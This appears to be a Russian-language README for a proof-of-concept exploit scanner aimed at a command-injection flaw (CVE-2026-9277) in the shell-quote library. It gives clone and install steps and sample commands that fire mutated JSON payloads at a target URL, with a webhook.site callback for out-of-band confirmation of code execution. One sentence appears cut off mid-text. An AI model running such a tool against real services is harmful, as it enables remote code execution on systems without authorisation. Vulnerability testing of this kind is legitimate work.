
Эксплойт proof-of-concept для CVE-2026-9277, уязвимости внедрения команд в библиотеке shell-quote. Выполняет рекурсивный обход JSON с комбинаторной мутацией для запуска RCE, поддерживает OOB-верификацию и ведение журнала без шума.
Специализированный Proof of Concept (PoC) скрипт, разработанный для проверки и демонстрации CVE-2026-9277 — структурной уязвимости командной инъекции, обнаруженной в устаревших версиях библиотеки shell-quote (<= 1.8.3).
Сканер выполняет глубокую структурную обработку входных JSON-полезных нагрузок для выявления векторов удаленного выполнения кода (RCE) посредством рекурсивного обхода, предотвращая ложные срабатывания с помощью динамического сетевого базового таймингового движка.
{"op": "..."} и аргументы для успешного обхода механизмов изоляции строк.Убедитесь, что установлен Python 3.10+ и необходимые пакеты:
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"
